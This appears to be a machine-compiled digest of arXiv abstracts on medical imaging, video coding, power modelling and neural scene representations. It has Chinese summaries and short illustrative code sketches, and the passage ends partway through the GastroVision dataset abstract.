    Abstract Accurate segmentation of topological tubular structures, such as blood vessels and roads, is crucial in various fields, ensuring accuracy and efficiency in downstream tasks. However, many factors complicate the task, including thin local structures and variable global morphologies. In this work, we note the specificity of tubular structures and use this knowledge to guide our DSCNet to simultaneously enhance perception in three stages: feature extraction, feature fusion, and loss constraint. First, we propose a dynamic snake convolution to accurately capture the features of tubular structures by adaptively focusing on slender and tortuous local structures. Subsequently, we propose a multi-view feature fusion strategy to complement the attention to features from multiple perspectives during feature fusion, ensuring the retention of important information from different global morphologies. Finally, a continuity constraint loss function, based on persistent homology, is proposed to constrain the topological continuity of the segmentation better. Experiments on 2D and 3D datasets show that our DSCNet provides better accuracy and continuity on the tubular structure segmentation task compared with several methods. Our codes will be publicly available.
    摘要 精准分割血管、道路等拓扑 tubular 结构在许多领域都至关重要,以确保下游任务的准确性和效率。然而,细小的局部结构和多变的全局形态等因素使这一任务十分复杂。在本工作中,我们注意到 tubular 结构的特殊性,并利用这一先验引导 DSCNet 在特征提取、特征融合和损失约束三个阶段同时增强感知。首先,我们提出动态蛇形卷积,通过自适应地聚焦于细长而曲折的局部结构,准确捕捉 tubular 结构的特征。其次,我们提出多视图特征融合策略,在特征融合时从多个视角补充对特征的关注,以保留来自不同全局形态的重要信息。最后,我们提出基于 persistent homology 的连续性约束损失函数,以更好地约束分割结果的拓扑连续性。在 2D 和 3D 数据集上的实验表明,DSCNet 在 tubular 结构分割任务上相比多种方法取得了更高的准确性和连续性。我们的代码将会公开。
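
A heavily simplified PyTorch sketch of the "snake" sampling idea along a single axis: each kernel tap is displaced vertically by a predicted offset, and the offsets are accumulated so neighbouring taps stay connected as a continuous curve. The kernel size, the tanh offset parameterization, and the single-axis restriction are illustrative simplifications; the official repository contains the actual DSCNet implementation:

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class SnakeConv1Axis(nn.Module):
    def __init__(self, in_ch, out_ch, k=9):
        super().__init__()
        self.k = k
        self.offset = nn.Conv2d(in_ch, k, 3, padding=1)   # one vertical offset per kernel tap
        self.fuse = nn.Conv2d(in_ch * k, out_ch, 1)       # combine the k sampled taps

    def forward(self, x):
        b, _, h, w = x.shape
        off = torch.cumsum(torch.tanh(self.offset(x)), dim=1)   # accumulated offsets -> continuous curve
        ys, xs = torch.meshgrid(torch.arange(h), torch.arange(w), indexing="ij")
        base = torch.stack((xs, ys), dim=-1).float().to(x.device)
        taps = []
        for i in range(self.k):
            grid = base.unsqueeze(0).expand(b, -1, -1, -1).clone()
            grid[..., 0] += i - self.k // 2          # fixed horizontal step of this tap
            grid[..., 1] += off[:, i]                # learned vertical "wiggle" of this tap
            grid[..., 0] = 2 * grid[..., 0] / (w - 1) - 1   # normalize for grid_sample
            grid[..., 1] = 2 * grid[..., 1] / (h - 1) - 1
            taps.append(F.grid_sample(x, grid, align_corners=True))
        return self.fuse(torch.cat(taps, dim=1))

print(SnakeConv1Axis(3, 8)(torch.randn(1, 3, 32, 32)).shape)  # torch.Size([1, 8, 32, 32])
```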

Component-wise Power Estimation of Electrical Devices Using Thermal Imaging

  • paper_url: http://arxiv.org/abs/2307.08354
  • repo_url: None
  • paper_authors: Christian Herglotz, Simon Grosche, Akarsh Bharadwaj, André Kaup
  • for: 本文提出一种利用热成像估计电路板上各个活动组件功率消耗的方法。
  • methods: 该方法基于热成像,组件和电路板可由塑料、带涂层的微芯片、金属键合或导线等异质材料构成,且不需要特殊的高发射率涂层;热图像的分割可通过手动标注、目标检测方法或利用布局信息获得。
  • results: 评估结果显示,使用低分辨率的消费级红外相机,在耗散功率大于 300mW 时,可达到约 10% 的平均估计误差。
    Abstract This paper presents a novel method to estimate the power consumption of distinct active components on an electronic carrier board by using thermal imaging. The components and the board can be made of heterogeneous material such as plastic, coated microchips, and metal bonds or wires, where a special coating for high emissivity is not required. The thermal images are recorded when the components on the board are dissipating power. In order to enable reliable estimates, a segmentation of the thermal image must be available that can be obtained by manual labeling, object detection methods, or exploiting layout information. Evaluations show that with low-resolution consumer infrared cameras and dissipated powers larger than 300mW, mean estimation errors of 10% can be achieved.
    摘要 本文提出了一种利用热成像估计电子载板上各个活动组件功率消耗的新方法。组件和载板可以由塑料、带涂层的微芯片、金属键合或导线等异质材料构成,无需特殊的高发射率涂层。热图像在板上组件耗散功率时采集。为获得可靠的估计,需要对热图像进行分割,分割可通过手动标注、目标检测方法或利用布局信息获得。评估结果显示,使用低分辨率的消费级红外相机,在耗散功率大于 300mW 时,平均估计误差可达 10%。
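
A toy sketch of the pipeline implied above: segment the thermal image per component, aggregate the temperature rise in each segment, and map it to power with a per-component calibration. The linear watts-per-kelvin mapping and the synthetic data are illustrative assumptions, not the paper's estimation model:

```python
import numpy as np

def estimate_powers(thermal, ambient, segments, coeffs):
    """thermal/ambient: (H, W) temperature maps; segments: (H, W) component labels;
    coeffs: calibrated W/K factor per component (assumed)."""
    rise = thermal - ambient
    return {lbl: c * rise[segments == lbl].mean() for lbl, c in coeffs.items()}

rng = np.random.default_rng(0)
ambient = np.full((64, 64), 25.0)
segments = np.zeros((64, 64), dtype=int)
segments[10:30, 10:30] = 1                      # component 1
segments[40:60, 40:60] = 2                      # component 2
thermal = ambient + rng.normal(0.0, 0.1, (64, 64))
thermal[segments == 1] += 8.0                   # synthetic 8 K rise
thermal[segments == 2] += 3.0                   # synthetic 3 K rise
print(estimate_powers(thermal, ambient, segments, {1: 0.05, 2: 0.10}))
```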

Neural Modulation Fields for Conditional Cone Beam Neural Tomography

  • paper_url: http://arxiv.org/abs/2307.08351
  • repo_url: https://github.com/samuelepapa/cond-cbnt
  • paper_authors: Samuele Papa, David M. Knigge, Riccardo Valperga, Nikita Moriakov, Miltos Kofinas, Jan-Jakob Sonke, Efstratios Gavves
  • for: 提高深度学习方法在 cone beam geometry computed tomography (CBCT) 重建中的精度和效率,使其能够在更复杂的CBCT重建中提供更好的结果。
  • methods: 基于神经场 (neural field, NF) 的方法,通过以空间坐标为输入的连续神经网络来近似重建的密度。新提出的 Conditional Cone Beam Neural Tomography (CondCBNT) 借助 Neural Modulation Field (NMF) 对每次扫描进行局部调制 (conditioning),使单一条件化 NF 能够适应不同扫描数据之间的变化。
  • results: CondCBNT 在可用投影数较多和较少、无噪声和有噪声的数据上均表现出更好的性能。
    Abstract Conventional Computed Tomography (CT) methods require large numbers of noise-free projections for accurate density reconstructions, limiting their applicability to the more complex class of Cone Beam Geometry CT (CBCT) reconstruction. Recently, deep learning methods have been proposed to overcome these limitations, with methods based on neural fields (NF) showing strong performance, by approximating the reconstructed density through a continuous-in-space coordinate based neural network. Our focus is on improving such methods, however, unlike previous work, which requires training an NF from scratch for each new set of projections, we instead propose to leverage anatomical consistencies over different scans by training a single conditional NF on a dataset of projections. We propose a novel conditioning method where local modulations are modeled per patient as a field over the input domain through a Neural Modulation Field (NMF). The resulting Conditional Cone Beam Neural Tomography (CondCBNT) shows improved performance for both high and low numbers of available projections on noise-free and noisy data.
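
A minimal sketch of the conditioning idea: a coordinate MLP reconstructs density, while a small per-scan "modulation field" produces location-dependent shifts of the hidden activations. Layer sizes and the additive FiLM-style conditioning are assumptions for illustration; in the paper the backbone is shared across scans and only the modulation field is scan-specific:

```python
import torch
import torch.nn as nn

class ModulatedField(nn.Module):
    def __init__(self, hidden=128):
        super().__init__()
        # Per-scan neural modulation field (in practice instantiated once per scan).
        self.mod = nn.Sequential(nn.Linear(3, 32), nn.ReLU(), nn.Linear(32, hidden))
        self.f1 = nn.Linear(3, hidden)     # shared backbone
        self.f2 = nn.Linear(hidden, hidden)
        self.out = nn.Linear(hidden, 1)    # reconstructed density at the queried point

    def forward(self, xyz):
        h = torch.relu(self.f1(xyz) + self.mod(xyz))   # local modulation of the shared features
        h = torch.relu(self.f2(h))
        return self.out(h)

print(ModulatedField()(torch.rand(1024, 3)).shape)   # torch.Size([1024, 1])
```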

Efficient coding of 360° videos exploiting inactive regions in projection formats

  • paper_url: http://arxiv.org/abs/2307.08344
  • repo_url: None
  • paper_authors: Christian Herglotz, Mohammadreza Jamali, Stéphane Coulombe, Carlos Vazquez, Ahmad Vakili
  • for: 通过忽略投影格式中的无效区域,提高 360° 视频的编码效率。
  • methods: 在率失真优化、残差变换和环路滤波中忽略无效区域的像素值;这些区域在重建 equirectangular 格式或虚拟现实视口时不会被用到,因此其内容无关紧要。
  • results: 可实现最高 10% 的比特率节省。
    Abstract This paper presents an efficient method for encoding common projection formats in 360$^\circ$ video coding, in which we exploit inactive regions. These regions are ignored in the reconstruction of the equirectangular format or the viewport in virtual reality applications. As the content of these pixels is irrelevant, we neglect the corresponding pixel values in rate-distortion optimization, residual transformation, as well as in-loop filtering and achieve bitrate savings of up to 10%.
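
A toy illustration of the key trick: inactive pixels simply do not contribute to the distortion term when comparing coding modes, so cheaper modes win in those areas. The mode structure and the Lagrange multiplier are placeholders, not part of any real encoder:

```python
import numpy as np

def rd_cost(orig, recon, bits, active_mask, lam=0.01):
    err = (orig.astype(float) - recon.astype(float)) ** 2
    return err[active_mask].sum() + lam * bits      # inactive pixels add no distortion

rng = np.random.default_rng(0)
orig = rng.integers(0, 256, (8, 8))
active = np.ones((8, 8), dtype=bool)
active[:, :2] = False                               # e.g. inactive padding of the projection format
mode_a = (orig + rng.integers(-3, 4, (8, 8)), 120)  # (reconstruction, bit cost): accurate but expensive
mode_b = (orig + rng.integers(-8, 9, (8, 8)), 60)   # coarser but cheaper
best = min([mode_a, mode_b], key=lambda m: rd_cost(orig, m[0], m[1], active))
print("chosen mode costs", best[1], "bits")
```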

Power Modeling for Virtual Reality Video Playback Applications

  • paper_url: http://arxiv.org/abs/2307.08338
  • repo_url: None
  • paper_authors: Christian Herglotz, Stéphane Coulombe, Ahmad Vakili, André Kaup
  • for: 评估并建模智能手机上现代虚拟现实播放与流媒体应用的能耗。
  • methods: 通过功率测量详细分析能耗,并构建一个估算真实能耗的模型(平均误差低于 3.5%);该模型可在电池电量临界时通过调整流媒体视频参数来节省能耗。
  • results: 结果显示,降低输入视频分辨率可显著降低能耗。
    Abstract This paper proposes a method to evaluate and model the power consumption of modern virtual reality playback and streaming applications on smartphones. Due to the high computational complexity of the virtual reality processing toolchain, the corresponding power consumption is very high, which reduces operating times of battery-powered devices. To tackle this problem, we analyze the power consumption in detail by performing power measurements. Furthermore, we construct a model to estimate the true power consumption with a mean error of less than 3.5%. The model can be used to save power at critical battery levels by changing the streaming video parameters. Particularly, the results show that the power consumption is significantly reduced by decreasing the input video resolution.
    摘要 本文提出了一种评估并建模智能手机上现代虚拟现实播放与流媒体应用能耗的方法。由于虚拟现实处理链的计算复杂度很高,相应的能耗也很大,缩短了电池供电设备的运行时间。为解决这一问题,我们通过功率测量对能耗进行了详细分析,并构建了一个估算真实能耗的模型,平均误差低于 3.5%。该模型可在电池电量临界时通过调整流媒体视频参数来节省电量。特别地,结果表明降低输入视频分辨率可显著减少能耗。
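
A hedged sketch of how such a playback power model can be fitted: measure power at several settings and solve a least-squares fit over simple features. The features (pixel rate and bitrate) and all numbers below are synthetic stand-ins, not the model or measurements from the paper:

```python
import numpy as np

rng = np.random.default_rng(0)
pixel_rate = rng.uniform(50, 500, 20)      # Mpx/s of the decoded video (synthetic)
bitrate = rng.uniform(1, 16, 20)           # Mbit/s of the stream (synthetic)
power = 1500 + 4.0 * pixel_rate + 40.0 * bitrate + rng.normal(0, 30, 20)  # synthetic "measurements" in mW

X = np.column_stack([np.ones(20), pixel_rate, bitrate])
coef, *_ = np.linalg.lstsq(X, power, rcond=None)   # least-squares fit of the linear power model
pred = X @ coef
print("fitted coefficients:", np.round(coef, 2))
print("mean relative error: %.2f%%" % (100 * np.mean(np.abs(pred - power) / power)))
```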

Power-Efficient Video Streaming on Mobile Devices Using Optimal Spatial Scaling

  • paper_url: http://arxiv.org/abs/2307.08337
  • repo_url: None
  • paper_authors: Christian Herglotz, André Kaup, Stéphane Coulombe, Ahmad Vakili
  • for: 本文为便携设备上的节能无线视频流媒体推导最优的空间缩放与码率控制参数。
  • methods: 基于文献中的功率模型和使用感知指标的主观质量评估,推导空间缩放因子与码率控制参数的最优组合。
  • results: 研究发现,可通过调整输入视频分辨率来优化质量-功耗折中:对于高清序列,可在几乎不损失质量的情况下节省最多 10% 的功耗,或在可容忍的失真下节省最多 15% 的功耗。该方法在 Wi-Fi 与移动网络以及两款不同的智能手机上均得到验证,具有普遍适用性。
    Abstract This paper derives optimal spatial scaling and rate control parameters for power-efficient wireless video streaming on portable devices. A video streaming application is studied, which receives a high-resolution and high-quality video stream from a remote server and displays the content to the end-user. We show that the resolution of the input video can be adjusted such that the quality-power trade-off is optimized. Making use of a power model from the literature and subjective quality evaluation using a perceptual metric, we derive optimal combinations of the scaling factor and the rate-control parameter for encoding. For HD sequences, up to 10% of power can be saved at negligible quality losses and up to 15% of power can be saved at tolerable distortions. To show general validity, the method was tested for Wi-Fi and a mobile network as well as for two different smartphones.
    摘要 本文为便携设备上的节能无线视频流传输推导最优的空间缩放与码率控制参数。研究对象是一个视频流应用,它从远程服务器接收高分辨率、高质量的视频流,并将内容展示给终端用户。我们证明,可以调整输入视频的分辨率,以优化质量-功耗折中。利用文献中的功率模型和基于感知指标的主观质量评估,我们推导出缩放因子与码率控制参数的最优组合。对于高清序列,可在几乎不损失质量的情况下节省最多 10% 的功耗,或在可容忍的失真下节省最多 15% 的功耗。为证明方法的普遍适用性,我们在 Wi-Fi 和移动网络以及两款不同的智能手机上进行了测试。
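
A sketch of the selection step the paper describes: search over (spatial scaling factor, rate-control parameter) pairs, keep those whose modeled quality loss stays below a threshold, and pick the one with the lowest modeled power. The quality and power functions below are crude placeholders, not the models used in the paper:

```python
import itertools

def power_model(scale, qp):
    return 2000.0 * scale + 10.0 * (51 - qp)             # mW, placeholder model

def quality_loss(scale, qp):
    return 8.0 * (1.0 - scale) + 0.4 * max(qp - 22, 0)   # perceptual-metric drop, placeholder model

def best_setting(max_loss=2.0):
    candidates = itertools.product([1.0, 0.9, 0.8, 0.75], range(22, 33))
    feasible = [(s, q) for s, q in candidates if quality_loss(s, q) <= max_loss]
    return min(feasible, key=lambda sq: power_model(*sq))

print(best_setting())   # lowest-power (scale, QP) pair within the allowed quality loss
```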

Combiner and HyperCombiner Networks: Rules to Combine Multimodality MR Images for Prostate Cancer Localisation

  • paper_url: http://arxiv.org/abs/2307.08279
  • repo_url: None
  • paper_authors: Wen Yan, Bernard Chiu, Ziyi Shen, Qianye Yang, Tom Syer, Zhe Min, Shonit Punwani, Mark Emberton, David Atkinson, Dean C. Barratt, Yipeng Hu
  • for: This paper aims to demonstrate the feasibility of using low-dimensional parametric models to model decision rules for radiologists' reading of multiparametric prostate MR scans, and to improve the efficiency of automated radiologist labeling.
  • methods: The proposed Combiner networks use a linear mixture model or a nonlinear stacking model to model PI-RADS decision rules, and train a single image segmentation network that can be conditioned on these hyperparameters during inference.
  • results: Experimental results based on data from 850 patients show that the proposed Combiner networks outperform other commonly-adopted end-to-end networks, and provide added advantages in obtaining and interpreting the modality combining rules. The paper also presents three clinical applications for prostate cancer segmentation, including modality availability assessment, importance quantification, and rule discovery.
    Abstract One of the distinct characteristics in radiologists' reading of multiparametric prostate MR scans, using reporting systems such as PI-RADS v2.1, is to score individual types of MR modalities, T2-weighted, diffusion-weighted, and dynamic contrast-enhanced, and then combine these image-modality-specific scores using standardised decision rules to predict the likelihood of clinically significant cancer. This work aims to demonstrate that it is feasible for low-dimensional parametric models to model such decision rules in the proposed Combiner networks, without compromising the accuracy of predicting radiologic labels: First, it is shown that either a linear mixture model or a nonlinear stacking model is sufficient to model PI-RADS decision rules for localising prostate cancer. Second, parameters of these (generalised) linear models are proposed as hyperparameters, to weigh multiple networks that independently represent individual image modalities in the Combiner network training, as opposed to end-to-end modality ensemble. A HyperCombiner network is developed to train a single image segmentation network that can be conditioned on these hyperparameters during inference, for much improved efficiency. Experimental results based on data from 850 patients, for the application of automating radiologist labelling multi-parametric MR, compare the proposed combiner networks with other commonly-adopted end-to-end networks. Using the added advantages of obtaining and interpreting the modality combining rules, in terms of the linear weights or odds-ratios on individual image modalities, three clinical applications are presented for prostate cancer segmentation, including modality availability assessment, importance quantification and rule discovery.
    摘要 放射科医生使用 PI-RADS v2.1 等报告系统阅读多参数前列腺 MR 图像时的一个显著特点是:先分别对 T2 加权、弥散加权和动态对比增强等各个 MR 模态进行评分,再按照标准化的决策规则将这些模态特定的评分结合起来,以预测临床显著癌症的可能性。本工作旨在证明,在所提出的 Combiner 网络中,可以用低维参数模型来建模这类决策规则,而不损失预测放射学标签的准确性。首先,研究表明线性混合模型或非线性堆叠模型都足以建模用于前列腺癌定位的 PI-RADS 决策规则。其次,这些(广义)线性模型的参数被作为超参数,用来对 Combiner 网络训练中分别表示各个图像模态的多个网络进行加权,而不是端到端的模态集成。我们进一步提出 HyperCombiner 网络,训练单个图像分割网络,使其在推理时可以根据这些超参数进行条件化,从而大幅提高效率。基于 850 名患者数据的实验将所提出的 Combiner 网络与其他常用的端到端网络进行了比较,用于自动化放射科医生对多参数 MR 的标注。借助可获得且可解释的模态组合规则(即各图像模态的线性权重或优势比),本文展示了前列腺癌分割的三个临床应用:模态可用性评估、重要性量化和规则发现。
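
A minimal sketch of the linear-mixture Combiner idea: per-modality cancer probability maps are mixed with a small set of interpretable weights that act as hyperparameters. The weights, threshold, and map shapes are illustrative assumptions:

```python
import numpy as np

def linear_combiner(prob_maps, weights, thr=0.5):
    """prob_maps: dict modality -> (H, W) probability map; weights: mixture weights summing to 1."""
    combined = sum(weights[m] * p for m, p in prob_maps.items())
    return combined > thr                           # final lesion mask

rng = np.random.default_rng(0)
maps = {m: rng.random((64, 64)) for m in ("T2w", "DWI", "DCE")}
weights = {"T2w": 0.3, "DWI": 0.5, "DCE": 0.2}      # assumed, interpretable modality weights
print("positive-voxel fraction:", linear_combiner(maps, weights).mean())
```

Because the rule is just a weighted sum, the learned weights (or odds ratios, in the logistic variant) can be read off directly, which is what enables the modality-importance and rule-discovery applications mentioned above.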

Liver Tumor Screening and Diagnosis in CT with Pixel-Lesion-Patient Network

  • paper_url: http://arxiv.org/abs/2307.08268
  • repo_url: None
  • paper_authors: Ke Yan, Xiaoli Yin, Yingda Xia, Fakai Wang, Shu Wang, Yuan Gao, Jiawen Yao, Chunli Li, Xiaoyu Bai, Jingren Zhou, Ling Zhang, Le Lu, Yu Shi
  • for: liver tumor segmentation and classification
  • methods: 使用 mask transformer 对每个病灶同时进行分割和分类,并配合 image-wise classifier 整合全局信息、预测患者级诊断
  • results: 在非对比 CT 的肿瘤筛查任务中,PLAN 达到 95% 和 96% 的患者级敏感性与特异性;在对比增强 CT 上,病灶级检测精度、召回率和分类准确率分别达到 92%、89% 和 86%,优于广泛使用的 CNN 和 transformer 分割模型;在 250 例保留集上的读者研究中,PLAN 的表现与资深放射科医生相当,表明结果具有临床意义。
    Abstract Liver tumor segmentation and classification are important tasks in computer aided diagnosis. We aim to address three problems: liver tumor screening and preliminary diagnosis in non-contrast computed tomography (CT), and differential diagnosis in dynamic contrast-enhanced CT. A novel framework named Pixel-Lesion-pAtient Network (PLAN) is proposed. It uses a mask transformer to jointly segment and classify each lesion with improved anchor queries and a foreground-enhanced sampling loss. It also has an image-wise classifier to effectively aggregate global information and predict patient-level diagnosis. A large-scale multi-phase dataset is collected containing 939 tumor patients and 810 normal subjects. 4010 tumor instances of eight types are extensively annotated. On the non-contrast tumor screening task, PLAN achieves 95% and 96% in patient-level sensitivity and specificity. On contrast-enhanced CT, our lesion-level detection precision, recall, and classification accuracy are 92%, 89%, and 86%, outperforming widely used CNN and transformers for lesion segmentation. We also conduct a reader study on a holdout set of 250 cases. PLAN is on par with a senior human radiologist, showing the clinical significance of our results.
    摘要 肝脏肿瘤的分割和分类是计算机辅助诊断中的重要任务。我们旨在解决三个问题:在非对比 CT 中进行肝肿瘤筛查与初步诊断,以及在动态对比增强 CT 中进行鉴别诊断。我们提出了名为 Pixel-Lesion-pAtient Network (PLAN) 的新框架。它使用 mask transformer,配合改进的 anchor queries 和前景增强的采样损失,对每个病灶同时进行分割和分类;同时还包含一个图像级分类器,以有效聚合全局信息并预测患者级诊断。我们收集了一个大规模多期数据集,包括 939 名肿瘤患者和 810 名正常受试者,其中 8 种类型共 4010 个肿瘤实例得到了详尽标注。在非对比 CT 肿瘤筛查任务上,PLAN 的患者级敏感性和特异性分别达到 95% 和 96%。在对比增强 CT 上,病灶级检测精度、召回率和分类准确率分别为 92%、89% 和 86%,优于广泛使用的 CNN 和 transformer 分割模型。我们还在 250 例保留集上进行了读者研究,PLAN 的表现与一名资深放射科医生相当,表明了我们结果的临床意义。
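
A toy sketch of fusing lesion-level predictions with an image-wise score into a patient-level decision; the averaging rule and threshold are assumptions made for illustration, not PLAN's actual aggregation:

```python
import numpy as np

def patient_diagnosis(lesion_probs, image_probs, thr=0.5):
    """lesion_probs: (N, C) class probabilities for N detected lesions;
    image_probs: (C,) probabilities from the image-wise classifier."""
    lesion_score = lesion_probs.max(axis=0)          # most confident lesion per class
    fused = 0.5 * lesion_score + 0.5 * image_probs   # simple average fusion (assumed)
    return int(fused.argmax()) if fused.max() > thr else -1   # -1: no significant finding

lesions = np.array([[0.1, 0.7, 0.2],                 # two detected lesions, three tumour classes
                    [0.6, 0.3, 0.1]])
print(patient_diagnosis(lesions, image_probs=np.array([0.2, 0.6, 0.2])))   # -> 1
```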

Extreme Image Compression using Fine-tuned VQGAN Models

  • paper_url: http://arxiv.org/abs/2307.08265
  • repo_url: None
  • paper_authors: Qi Mao, Tinghan Yang, Yinuo Zhang, Shuyin Pan, Meng Wang, Shiqi Wang, Siwei Ma
  • for: 提高压缩数据的感知质量,特别是在低比特率下。
  • methods: 将基于 vector quantization (VQ) 的生成模型 (VQGAN) 引入图像压缩领域,把图像表示为最近码字的 VQ 索引,并用 K-means 将预训练的大规模码本聚类为多个较小的码本,从而获得可变比特率与不同的重建质量。
  • results: 在极低比特率(< 0.1 bpp)下显著提升压缩图像的感知质量,超越现有最先进的编解码器。
    Abstract Recent advances in generative compression methods have demonstrated remarkable progress in enhancing the perceptual quality of compressed data, especially in scenarios with low bitrates. Nevertheless, their efficacy and applicability in achieving extreme compression ratios ($<0.1$ bpp) still remain constrained. In this work, we propose a simple yet effective coding framework by introducing vector quantization (VQ)-based generative models into the image compression domain. The main insight is that the codebook learned by the VQGAN model yields strong expressive capacity, facilitating efficient compression of continuous information in the latent space while maintaining reconstruction quality. Specifically, an image can be represented as VQ-indices by finding the nearest codeword, which can be encoded using lossless compression methods into bitstreams. We then propose clustering a pre-trained large-scale codebook into smaller codebooks using the K-means algorithm. This enables images to be represented as diverse ranges of VQ-indices maps, resulting in variable bitrates and different levels of reconstruction quality. Extensive qualitative and quantitative experiments on various datasets demonstrate that the proposed framework outperforms the state-of-the-art codecs in terms of perceptual quality-oriented metrics and human perception under extremely low bitrates.
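
A sketch of the two ingredients described in the abstract: (1) encoding latents as nearest-codeword VQ indices, and (2) clustering a large pretrained codebook into a smaller one with K-means so fewer bits are spent per index. Codebook sizes and latent dimensions are illustrative stand-ins, not the paper's VQGAN configuration:

```python
import numpy as np
from sklearn.cluster import KMeans

rng = np.random.default_rng(0)
codebook = rng.normal(size=(1024, 16))    # stand-in for a pretrained VQGAN codebook
latents = rng.normal(size=(32 * 32, 16))  # stand-in for an encoder's latent grid (flattened)

def vq_indices(z, cb):
    d = ((z[:, None, :] - cb[None, :, :]) ** 2).sum(-1)   # squared distance to every codeword
    return d.argmin(axis=1)                               # nearest-codeword index per latent

idx_full = vq_indices(latents, codebook)                  # log2(1024) = 10 bits per index
small_cb = KMeans(n_clusters=128, n_init=10, random_state=0).fit(codebook).cluster_centers_
idx_small = vq_indices(latents, small_cb)                 # log2(128) = 7 bits per index
print(idx_full[:5], idx_small[:5])
```

The index maps would then be entropy-coded losslessly; swapping between codebooks of different sizes is what yields the variable bitrates mentioned above.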

Adaptively Placed Multi-Grid Scene Representation Networks for Large-Scale Data Visualization

  • paper_url: http://arxiv.org/abs/2308.02494
  • repo_url: https://github.com/skywolf829/apmgsrn
  • paper_authors: Skylar Wolfgang Wurster, Tianyu Xiong, Han-Wei Shen, Hanqi Guo, Tom Peterka
  • for: 针对科学数据的压缩与可视化,改进 Scene Representation Networks (SRNs) 的重建质量。
  • methods: 提出自适应放置的多网格 SRN (APMGSRN),并采用域分解 (domain decomposition) 的训练与推理技术,在多 GPU 系统上加速并行训练。
  • results: APMGSRN 无需昂贵的 octree 细化、剪枝和遍历即可提升 SRNs 对科学数据的重建精度;同时发布了一个开源的神经体渲染应用,可即插即用地渲染任何基于 PyTorch 的 SRN。
    Abstract Scene representation networks (SRNs) have been recently proposed for compression and visualization of scientific data. However, state-of-the-art SRNs do not adapt the allocation of available network parameters to the complex features found in scientific data, leading to a loss in reconstruction quality. We address this shortcoming with an adaptively placed multi-grid SRN (APMGSRN) and propose a domain decomposition training and inference technique for accelerated parallel training on multi-GPU systems. We also release an open-source neural volume rendering application that allows plug-and-play rendering with any PyTorch-based SRN. Our proposed APMGSRN architecture uses multiple spatially adaptive feature grids that learn where to be placed within the domain to dynamically allocate more neural network resources where error is high in the volume, improving state-of-the-art reconstruction accuracy of SRNs for scientific data without requiring expensive octree refining, pruning, and traversal like previous adaptive models. In our domain decomposition approach for representing large-scale data, we train an set of APMGSRNs in parallel on separate bricks of the volume to reduce training time while avoiding overhead necessary for an out-of-core solution for volumes too large to fit in GPU memory. After training, the lightweight SRNs are used for realtime neural volume rendering in our open-source renderer, where arbitrary view angles and transfer functions can be explored. A copy of this paper, all code, all models used in our experiments, and all supplemental materials and videos are available at https://github.com/skywolf829/APMGSRN.
    摘要 场景表示网络 (Scene representation networks, SRNs) 最近被提出用于科学数据的压缩与可视化。然而,当前最先进的 SRNs 不会根据科学数据中复杂的特征来调整可用网络参数的分配,导致重建质量下降。我们通过自适应放置的多网格 SRN (APMGSRN) 解决这一缺陷,并提出一种域分解的训练与推理技术,用于在多 GPU 系统上加速并行训练。我们还发布了一个开源的神经体渲染应用,可即插即用地渲染任何基于 PyTorch 的 SRN。APMGSRN 架构使用多个空间自适应的特征网格,这些网格学习自身在域中的放置位置,从而在体数据中误差较高的区域动态分配更多的网络资源,在不需要像以往自适应模型那样进行昂贵的 octree 细化、剪枝和遍历的情况下,提高了 SRNs 对科学数据的重建精度。在用于表示大规模数据的域分解方法中,我们在体数据的不同分块 (bricks) 上并行训练一组 APMGSRN,以缩短训练时间,同时避免体数据过大而无法装入 GPU 显存时 out-of-core 方案所需的额外开销。训练完成后,这些轻量级 SRN 可在我们的开源渲染器中用于实时神经体渲染,支持任意视角和传输函数的探索。论文副本、全部代码、实验所用的全部模型以及所有补充材料和视频均可在 https://github.com/skywolf829/APMGSRN 获取。
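
A minimal sketch of the adaptively placed multi-grid idea: each feature grid owns a learned placement (here just a per-grid scale and offset), query coordinates are mapped into every grid's local frame, and the sampled features are decoded by a small MLP. Grid resolution, feature width, and the affine-only placement are simplifying assumptions relative to the released APMGSRN code:

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class MultiGridSRN(nn.Module):
    def __init__(self, n_grids=4, res=16, feat=8):
        super().__init__()
        self.grids = nn.Parameter(torch.randn(n_grids, feat, res, res, res) * 0.01)
        self.scale = nn.Parameter(torch.ones(n_grids, 3))    # learned per-grid placement: scale
        self.shift = nn.Parameter(torch.zeros(n_grids, 3))   # learned per-grid placement: offset
        self.decoder = nn.Sequential(nn.Linear(n_grids * feat, 64), nn.ReLU(), nn.Linear(64, 1))

    def forward(self, xyz):                                  # xyz in [-1, 1]^3, shape (N, 3)
        feats = []
        for g in range(self.grids.shape[0]):
            local = xyz * self.scale[g] + self.shift[g]      # move the query into this grid's frame
            grid = local.view(1, -1, 1, 1, 3)
            f = F.grid_sample(self.grids[g:g + 1], grid, align_corners=True)
            feats.append(f.view(f.shape[1], -1).t())         # (N, feat)
        return self.decoder(torch.cat(feats, dim=1))         # predicted scalar value per query point

print(MultiGridSRN()(torch.rand(256, 3) * 2 - 1).shape)      # torch.Size([256, 1])
```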

GastroVision: A Multi-class Endoscopy Image Dataset for Computer Aided Gastrointestinal Disease Detection

  • paper_url: http://arxiv.org/abs/2307.08140
  • repo_url: https://github.com/debeshjha/gastrovision
  • paper_authors: Debesh Jha, Vanshali Sharma, Neethi Dasu, Nikhil Kumar Tomar, Steven Hicks, M. K. Bhuyan, Pradip K. Das, Michael A. Riegler, Pål Halvorsen, Ulas Bagci, Thomas de Lange
  • for: 本研究旨在解决将实时人工智能 (AI) 系统整合到临床实践中所面临的挑战,包括可扩展性与可接受性。
  • methods: 本研究构建了多中心开放获取的胃肠 (GI) 内镜图像数据集 GastroVision,涵盖消化道的不同解剖标志、病理异常、息肉切除病例和正常所见(共 27 个类别)。数据集包含来自挪威 Bærum 医院和瑞典 Karolinska 大学医院的 8,000 幅图像,并由经验丰富的胃肠内镜医生进行标注和验证。
  • results: 我们基于流行的深度学习基线模型进行了广泛的 benchmark,验证了该数据集的价值。我们相信该数据集能够促进基于 AI 的胃肠疾病检测与分类算法的发展。数据集可在 \url{https://osf.io/84e7f/} 获取。
    Abstract Integrating real-time artificial intelligence (AI) systems in clinical practices faces challenges such as scalability and acceptance. These challenges include data availability, biased outcomes, data quality, lack of transparency, and underperformance on unseen datasets from different distributions. The scarcity of large-scale, precisely labeled, and diverse datasets are the major challenge for clinical integration. This scarcity is also due to the legal restrictions and extensive manual efforts required for accurate annotations from clinicians. To address these challenges, we present \textit{GastroVision}, a multi-center open-access gastrointestinal (GI) endoscopy dataset that includes different anatomical landmarks, pathological abnormalities, polyp removal cases and normal findings (a total of 27 classes) from the GI tract. The dataset comprises 8,000 images acquired from B{\ae}rum Hospital in Norway and Karolinska University Hospital in Sweden and was annotated and verified by experienced GI endoscopists. Furthermore, we validate the significance of our 